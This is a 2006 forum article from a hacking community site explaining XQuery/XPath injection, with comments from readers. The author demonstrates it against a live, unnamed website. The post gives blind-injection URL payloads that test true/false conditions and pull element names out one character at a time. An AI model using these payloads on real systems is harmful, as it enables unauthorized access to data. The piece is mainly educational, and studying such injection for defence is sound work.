View news

XQuery is safe?
Posted by rhican - Friday February 24 @ 23:20 Some of you will have already heard of XML databases. It's a newish field of research in the database world. It hasn't been used much yet. Not even all standards are accepted. Furthermore the supporting software isn't really stable, robust or scalable...at least not in my experience. However since PHP/SQL is by default quite flawed in the security department, it often profiles itself as having better security. In several fields, and several implementations this is surely true. However... some of it's security is based on obscurity, since few people know about it. So in this article I'll show it is possible to 'exploit' a website that uses XQuery. Some of you will have heard me complain the last few weeks about how I couldn't get it to work right. So I was surprised when I found a website actually using this technology. However I already explained that it is rather annoying to learn. It is a functional programming 'language', it has a non-intuitive syntax (imho) ... So how does it work: - Your data is in XML files (something like html <a>something<m p="5">hello</m></a>) - You can query this XML file, with something like XQuery (Think of it as a SQL for XML-files) - XPath is part of XQuery (you can locate data in XML using something resembling unix path's) I will try to keep explaining it as I go along, but if you want to know more you can always check the W3C specifications (although they aren't final yet) at http://www.w3.org/TR/xquery/ and http://www.w3.org/TR/xpath. The latter is most important. Back to our example. The url of a normal page at this site is Code: `(url)?pid=t64` If you add a ' to the end of the url, something you would do if you wanted to know if it could be vulnerable to SQL-injection. You get this error Quote: The following error has occured: javax.servlet.jsp.JspException: XQUERY_PARSE_ERROR: line 1: unexpected end of input. Wow that's really informative. It's a plaintext error message. If this was a SQL error everybody would be all over it trying to exploit it. But how would it work with XQuery? Well what we want at this stage is access to the database, if passwords were stored here, it would be a severe security risk. However this site doesn't appear to have it, so it is just a proof of concept, which is why release it to the public. In order to get access to the database we need one of the following two things: - Make the webserver output the data we want to have - Make the server give boolean (yes/no) responses to queries (like with Blind SQL) Here's a url that works Code: `(url)?pid=t53']['a'%20eq%20'a` Here's a url that doesn't work Code: `(url)?pid=t53']['b'%20eq%20'a` So basicaly that last expression is evaluated by the server. And we get a yes or no response. Just like with SQL we can now explore the entire database. Just by adding an extra pare of [] between the previous urls we can add an extra condition. For example: Code: `(url)?pid=t53'][fn:abs(2)=1]['a'%20eq%20'a` So we can use functions, that are native to XPath you can find a listing here: XPath functions In SQL we would want to get the table names first. In XML there aren't any tables, just items. I'll show you how you would be able to get the name of the parent element. This might be a little abstract for you. Just look at it as a Unix path system. Every tag (something like <store></store>) is actually a folder. A folder can contain more folders etc.. And at any given time you are somewhere in your directory structure. We want to know the name of the parent item for example. Here is how I would get the first letter: Code: `(url)?pid=t53'][fn:string-to-codepoints(fn:substring(./../name(),1,1))>67]['a'%20eq%20'a` "./../name()" is translated as the "name of my parent" The other functions are described on the paged referenced above. >67 just a yes or no question to the DB. All this was done in XPath, you could use the full functionality of XQuery by adding ", XQUERY stuff," in between, but I couldn't get it to work yet. Rhican

Last edited on Wednesday March 8 @ 16:04 by rhican

Posted by rhican - Friday February 24 @ 23:20

Some of you will have already heard of XML databases. It's a newish field of research in the database world. It hasn't been used much yet. Not even all standards are accepted. Furthermore the supporting software isn't really stable, robust or scalable...at least not in my experience.

However since PHP/SQL is by default quite flawed in the security department, it often profiles itself as having better security. In several fields, and several implementations this is surely true. However... some of it's security is based on obscurity, since few people know about it.

So in this article I'll show it is possible to 'exploit' a website that uses XQuery.

Some of you will have heard me complain the last few weeks about how I couldn't get it to work right. So I was surprised when I found a website actually using this technology.

However I already explained that it is rather annoying to learn. It is a functional programming 'language', it has a non-intuitive syntax (imho) ...

So how does it work:
- Your data is in XML files (something like html <a>something<m p="5">hello</m></a>)
- You can query this XML file, with something like XQuery (Think of it as a SQL for XML-files)
- XPath is part of XQuery (you can locate data in XML using something resembling unix path's)

I will try to keep explaining it as I go along, but if you want to know more you can always check the W3C specifications (although they aren't final yet) at http://www.w3.org/TR/xquery/ and http://www.w3.org/TR/xpath. The latter is most important.

Back to our example.
The url of a normal page at this site is

Code:
(url)?pid=t64

If you add a ' to the end of the url, something you would do if you wanted to know if it could be vulnerable to SQL-injection.

You get this error

Quote:
The following error has occured: javax.servlet.jsp.JspException: XQUERY_PARSE_ERROR: line 1: unexpected end of input.

Wow that's really informative. It's a plaintext error message. If this was a SQL error everybody would be all over it trying to exploit it. But how would it work with XQuery?

Well what we want at this stage is access to the database, if passwords were stored here, it would be a severe security risk. However this site doesn't appear to have it, so it is just a proof of concept, which is why release it to the public.

In order to get access to the database we need one of the following two things:
- Make the webserver output the data we want to have
- Make the server give boolean (yes/no) responses to queries
(like with Blind SQL)

Here's a url that works

Code:
(url)?pid=t53']['a'%20eq%20'a

Here's a url that doesn't work

Code:
(url)?pid=t53']['b'%20eq%20'a

So basicaly that last expression is evaluated by the server. And we get a yes or no response.

Just like with SQL we can now explore the entire database. Just by adding an extra pare of [] between the previous urls we can add an extra condition.
For example:

Code:
(url)?pid=t53'][fn:abs(2)=1]['a'%20eq%20'a

So we can use functions, that are native to XPath you can find a listing here: XPath functions

In SQL we would want to get the table names first. In XML there aren't any tables, just items. I'll show you how you would be able to get the name of the parent element. This might be a little abstract for you. Just look at it as a Unix path system. Every tag (something like <store></store>) is actually a folder. A folder can contain more folders etc..
And at any given time you are somewhere in your directory structure. We want to know the name of the parent item for example.

Here is how I would get the first letter:

Code:
(url)?pid=t53'][fn:string-to-codepoints(fn:substring(./../name(),1,1))>67]['a'%20eq%20'a

"./../name()" is translated as the "name of my parent"
The other functions are described on the paged referenced above.

>67 just a yes or no question to the DB.

All this was done in XPath, you could use the full functionality of XQuery by adding ", XQUERY stuff," in between, but I couldn't get it to work yet.

Rhican

» Comments

XaVeRiuS on 25 February 2006 22:30

Nice article :)
I head never heard of (well, how shall I call it - ) XQuery-Injections before... Why don't you create a challenge on it?

rhican on 26 February 2006 20:48

I'll think about it..

cake on 1 March 2006 13:00

nice text rhican, it's always nice to read some good texts

cracker-net on 22 April 2006 00:43

I don't know anything about XQuery and i understood it.
really informative. (NOT sarc ;) )

» Add a comment

Login if you want to comment on this item.

Net-Force.nl

Submenu

Login

Online members

Poll

View news

» Comments

» Add a comment

Guests:	3
Members:	0